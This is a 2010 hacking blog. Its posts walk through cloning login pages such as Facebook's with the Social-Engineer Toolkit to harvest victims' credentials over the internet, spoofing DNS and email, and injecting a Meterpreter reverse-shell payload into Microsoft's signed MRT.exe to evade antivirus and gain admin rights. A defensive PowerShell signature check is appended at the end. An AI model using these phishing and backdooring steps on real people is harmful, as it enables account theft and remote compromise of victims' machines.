Thursday 23 December 2010

AVG Internet Security - Firewall Test! Quick Nmap Scan

Hi all, this is just a short post. To help keep yourselves better protected I recommend AVG 2011 full. In the video I show one reason why you should: it has an amazing firewall, as demonstrated in the video. I will be making more videos about how AVG is great later on :) Enjoy!!

Wednesday 15 December 2010

How To: Remote Harvest Credentials (no-ip) e.g. Facebook Account Hack


In this post I will first go over what's in the video, then I will show you how to edit the config file for SET.
BTW in this vid I'm running Ubuntu 10.10 with Macbuntu installed.

To do this attack online instead of on the local subnet (which I showed you last time) you will need to use a dynamic DNS service; in the video I use no-ip.com. Just make an account and assign a host name to your IP. This will act as a website URL pointing to the IP your web server is running on.


In the video I mention something that is different from the server setup in the last video: I had to enter my IP address. This is because I have edited the config file to suit my other preferences and the options available in the SET script, which I'm now about to move on to. For the next load of text I have been lazy and have used the site http://www.social-engineer.org/framework/Computer_Based_Social_Engineering_Tools:_Social_Engineer_Toolkit_(SET), which belongs to the people who made SET. I have just cut some of the irrelevant stuff out and pasted the rest onto this page. But I would encourage a read of the link, as it gives a good understanding of how each attack vector and option works, which I won't cover in this post.


Now to edit the config file, which is located at
----------------------------------------------
root@bt:/pentest/exploits/SET/config# ls
mailing_list.txt  set_config  set_config.save
----------------------------------------------
To edit set_config type "nano set_config", or replace nano with your preferred text editor (nano is mine).
Now for the copy and paste :)
----------------------------------------------

Beginning with the Social Engineer Toolkit

The brains behind SET is its configuration file. SET by default works perfectly for most people; however, advanced customization may be needed in order to ensure that the attack vectors go off without a hitch. First thing to do is ensure that you have updated SET, from the directory:
root@bt:/pentest/exploits/SET# svn update
U    src/payloadgen/payloadgen.py
U    src/java_applet/Java.java
U    src/java_applet/jar_file.py
U    src/web_clone/cloner.py
U    src/msf_attacks/create_payload.py
U    src/harvester/scraper.py
U    src/html/clientside/gen_payload.py
U    src/html/web_server.py
U    src/arp_cache/arp_cache.py
U    set
U    readme/CHANGES
Updated to revision 319.
root@bt:/pentest/exploits/SET#
Once you’ve updated to the latest version, start tweaking your attack by editing the SET configuration file. Let’s walk through each of the flags:
root@bt:/pentest/exploits/set# nano config/set_config

# DEFINE THE PATH TO METASPLOIT HERE, FOR EXAMPLE /pentest/exploits/framework3
METASPLOIT_PATH=/pentest/exploits/framework3
Looking through the configuration options, you can change specific fields to get a desired result. In the first option, you can change the path to where Metasploit is located. Metasploit is used for the payload creation, file format bugs, and for the browser exploit sections.
# SPECIFY WHAT INTERFACE YOU WANT ETTERCAP TO LISTEN ON, IF NOTHING WILL DEFAULT
# EXAMPLE: ETTERCAP_INTERFACE=wlan0
ETTERCAP_INTERFACE=eth0
#
# ETTERCAP HOME DIRECTORY (NEEDED FOR DNS_SPOOF)
ETTERCAP_PATH=/usr/share/ettercap
The Ettercap section can be used when you’re on the same subnet as the victims and you want to perform DNS poison attacks against a subset of IP addresses. When this flag is set to ON, it will poison the entire local subnet and redirect a specific site or all sites to your malicious server running.
# SENDMAIL ON OR OFF FOR SPOOFING EMAIL ADDRESSES
SENDMAIL=OFF
Setting the SENDMAIL flag to ON will try starting SENDMAIL, which can spoof source email addresses. This attack only works if the victim's SMTP server does not perform reverse lookups on the hostname. SENDMAIL must be installed. If you're using BackTrack 4, it is installed by default.
# SET TO ON IF YOU WANT TO USE EMAIL IN CONJUNCTION WITH WEB ATTACK
WEBATTACK_EMAIL=OFF
When setting the WEBATTACK_EMAIL to ON, it will allow you to send mass emails to the victim while utilizing the Web Attack vector. Traditionally the emailing aspect is only available through the spear-phishing menu however when this is enabled it will add additional functionality for you to be able to email victims with links to help better your attacks.
# CREATE SELF-SIGNED JAVA APPLETS AND SPOOF PUBLISHER NOTE THIS REQUIRES YOU TO
# INSTALL --->  JAVA 6 JDK, BT4 OR UBUNTU USERS: apt-get install openjdk-6-jdk
# IF THIS IS NOT INSTALLED IT WILL NOT WORK. CAN ALSO DO apt-get install sun-java6-jdk
SELF_SIGNED_APPLET=OFF
The Java Applet Attack vector is the attack with one of the highest rates of success that SET has in its arsenal. To make the attack look more believable, you can turn this flag on, which will allow you to sign the Java Applet with whatever name you want. Say you're targeting CompanyX: the standard Java Applet is signed by Microsoft, but you can sign the applet with CompanyX to make it look more believable. This will require you to install Java's JDK (in Ubuntu it's apt-get install sun-java6-jdk or openjdk-6-jdk).
# AUTODETECTION OF IP ADDRESS INTERFACE UTILIZING GOOGLE, SET THIS ON IF YOU WANT
# SET TO AUTODETECT YOUR INTERFACE
AUTO_DETECT=ON
The AUTO_DETECT flag is probably one of the most asked questions in SET. In most cases, SET will grab the interface you use in order to connect out to the Internet and use that as the reverse connection and IP address. Most attacks need to be customized and may not be on the internal network. If you turn this flag to OFF, SET will prompt you with additional questions on setting up the attack. This flag should be used when you want to use multiple interfaces, have an external IP, or you’re in a NAT/Port forwarding scenario.
# SPECIFY WHAT PORT TO RUN THE HTTP SERVER OFF OF THAT SERVES THE JAVA APPLET ATTACK
# OR METASPLOIT EXPLOIT. DEFAULT IS PORT 80.
WEB_PORT=80
By default the SET web server listens on port 80, if for some reason you need to change this, you can specify an alternative port.
# CUSTOM EXE YOU WANT TO USE FOR METASPLOIT ENCODING, THIS USUALLY HAS BETTER AV
# DETECTION. CURRENTLY IT IS SET TO LEGIT.BINARY WHICH IS JUST CALC.EXE. AN EXAMPLE
# YOU COULD USE WOULD BE PUTTY.EXE SO THIS FIELD WOULD BE /pathtoexe/putty.exe
CUSTOM_EXE=src/exe/legit.binary
When using the payload encoding options of SET, the best option for anti-virus bypass is the backdoored executable option, i.e. an executable loaded with a malicious payload hidden inside it. Specifically, an exe is backdoored with a Metasploit based payload and can generally evade most AVs out there. SET has an executable built into it for the backdooring of the exe; however, if for some reason you want to use a different executable, you can specify the path to that exe with the CUSTOM_EXE flag.
# USE APACHE INSTEAD OF STANDARD PYTHON WEB SERVERS, THIS WILL INCREASE SPEED OF
# THE ATTACK VECTOR
APACHE_SERVER=OFF
#
# PATH TO THE APACHE WEBROOT
APACHE_DIRECTORY=/var/www
The web server utilized within SET is a custom-coded web server that can at times be somewhat slow depending on what it has to serve. If you find that you need a boost and want to utilize Apache, you can flip this switch to ON and it will use Apache to handle the web requests and speed your attack up. Note that this option only works with the Java Applet and Metasploit based attacks. Because those methods rely on intercepting credentials, Apache cannot be used with the web jacking, tabnabbing, or credential harvester attack methods.
# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR
WEBATTACK_SSL=OFF
#
# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
# YOU CAN CREATE YOUR OWN UTILIZING SET, JUST TURN ON SELF_SIGNED_CERT
# IF YOUR USING THIS FLAG, ENSURE OPENSSL IS INSTALLED!
#
SELF_SIGNED_CERT=OFF
#
# BELOW IS THE CLIENT/SERVER (PRIVATE) CERT, THIS MUST BE IN PEM FORMAT IN ORDER TO WORK
# SIMPLY PLACE THE PATH YOU WANT FOR EXAMPLE /root/ssl_client/server.pem
PEM_CLIENT=/root/newcert.pem
PEM_SERVER=/root/newreq.pem
In some cases, when you're performing an advanced social-engineering attack, you may want to register a domain and buy an SSL cert that makes the attack more believable. You can incorporate SSL based attacks with SET. You will need to turn WEBATTACK_SSL to ON. If you want to use self-signed certificates you can as well; however, there will be an "untrusted" warning when a victim goes to your website.
# TWEAK THE WEB JACKING TIME USED FOR THE IFRAME REPLACE, SOMETIMES IT CAN BE A LITTLE SLOW
# AND HARDER TO CONVINCE THE VICTIM. 5000 = 5 seconds
WEBJACKING_TIME=2000
The webjacking attack is performed by replacing the victim's browser window with another window that is made to look like a legitimate site. This attack is very dependent on timing: if you're doing it over the Internet, I recommend the delay be 5000 (5 seconds); otherwise, if you're internal, 2000 (2 seconds) is probably a safe bet.

How To: Harvest Credentials e.g. Facebook Account Hacked !

What is SET:


"The Social-Engineer Toolkit (SET) is specifically designed to perform advanced attacks against the human element. SET was designed to be released with the http://www.social-engineer.org launch and has quickly become a standard tool in a penetration tester's arsenal. SET was written by David Kennedy (ReL1K) and with a lot of help from the community it has incorporated attacks never before seen in an exploitation toolset. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test."

In the video I walk you through the selections to make to create your fake site, ready for your victim.
Without changing the config file the server will run locally on your internal IP, for example 192.168.X.X. To get it working on your remote IP you will have to edit your config file, which I shall cover in my next post as it isn't relevant here (my next post is gonna be written straight after this!).
For the Credential Harvester to be successful you need to clone a site with username and password login fields, e.g. Facebook.
Not much more to say than: the victim connects to the site, thinks it's legit, logs in and you get the credentials. The fake site is made to redirect the victim to the proper site after they think they have logged in.

To do this on a local network on the same subnet you can use ettercap's dns_spoof to spoof your victims into going to your site. This can be done in the config file and/or the ettercap GUI/command line (editing the config file will be in my next post). DNS spoofing will come soon.
My next post will be about doing this remotely using a DNS service like no-ip.com, and I'll do a write-up of editing the config file.
Any questions, give me a buzz :)


Sunday 5 December 2010

Hide Payload In Trusted EXE to Bypass AV's

This is a video to show you how to hide the Metasploit Meterpreter payload in a trusted exe to help bypass antivirus detection.

Obviously this is useful and this method is very effective.

In my demonstration I use the Microsoft Malicious Software Removal Tool (hehe, the irony). This is good for the following reasons:
1. Has the Microsoft signature (helps when trying to go undetected)
2. Asks the user to run in admin mode with UAC, giving us higher privs :)

To keep the payload undetected and hidden from AVs I recommend injecting it into a trusted exe. In the video I use Microsoft's Malicious Software Removal Tool. The good thing about this exe is that it works! Not all exes will work, so you will have to do some testing. For example the payload might not execute correctly, so you will have to test this yourself. But the best thing is that the exe from Microsoft asks the user to run as admin, which means on Windows Vista/7 you will be able to get higher privileges and run commands like "scheduleme" shown in my Backdoor video.


./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT= R|./msfencode -c 5 -e x86/shikata_ga_nai -x /root/ -t exe > /root/

OK, so what this command does is:

(./msfpayload windows/meterpreter/reverse_tcp LHOST=***.***.***.*** LPORT=****) = the basic Metasploit Meterpreter payload config (listener IP and port)

(R) = creates the payload and keeps it RAW, without encoding it into an exe for example

(| ./msfencode) = pipes the RAW payload into the encode process

(./msfencode -c 5 -e x86/shikata_ga_nai) = encodes the payload 5 times with the x86/shikata_ga_nai encoder

(-x /root/ -t exe > /root/name.exe) = takes the encoded payload, injects it into the trusted exe given with -x, and writes the new file out as name.exe

Then execute on the victim machine and bingo :)
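A caveat from the defender's side, as an added example that is not part of the original post: injecting a payload into a signed Microsoft binary rewrites its bytes, so the Authenticode signature embedded in the file no longer matches the file hash, and Windows reports HashMismatch (or NotSigned if the signature table was stripped) instead of Valid. The PowerShell below checks a downloaded executable before it is trusted or allowed to elevate; the file path and the expected signer string are placeholders.

```powershell
# Added example, not code from the original post. Checks whether an executable still
# carries a valid Authenticode signature before it is trusted or allowed to elevate.
# Backdooring a signed PE (as msfencode -x does) rewrites its bytes, so the signature
# embedded in the file no longer matches its hash and Windows reports HashMismatch;
# if the tool stripped the signature table entirely the result is NotSigned.
function Test-TrustedExecutable {
    param(
        [Parameter(Mandatory = $true)]
        [string]$Path,                                        # file under review
        [string]$ExpectedSigner = 'CN=Microsoft Corporation'  # substring expected in the signer subject (assumption)
    )

    if (-not (Test-Path -LiteralPath $Path)) {
        throw "File not found: $Path"
    }

    $sig     = Get-AuthenticodeSignature -FilePath $Path
    $subject = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { '<no signer>' }

    # Only Status -eq Valid means "signed by a trusted chain and unmodified since signing".
    # HashMismatch is the tell for a tampered binary that still claims a publisher.
    $verdict = switch ($sig.Status) {
        'Valid'        { if ($subject -like "*$ExpectedSigner*") { 'trusted' } else { 'valid but unexpected signer' } }
        'HashMismatch' { 'TAMPERED: file modified after signing' }
        'NotSigned'    { 'unsigned' }
        default        { "not trusted ($($sig.Status))" }
    }

    [pscustomobject]@{
        Path    = $Path
        Status  = $sig.Status
        Signer  = $subject
        Verdict = $verdict
    }
}

# Usage (path is a placeholder for the downloaded copy of the tool):
Test-TrustedExecutable -Path 'C:\Users\Public\Downloads\MRT.exe' | Format-List
```

The genuine tool from Microsoft returns Status Valid with a Microsoft signer subject; the UAC prompt for a tampered copy will likewise show the publisher as unverified, which is the user-visible version of the same check.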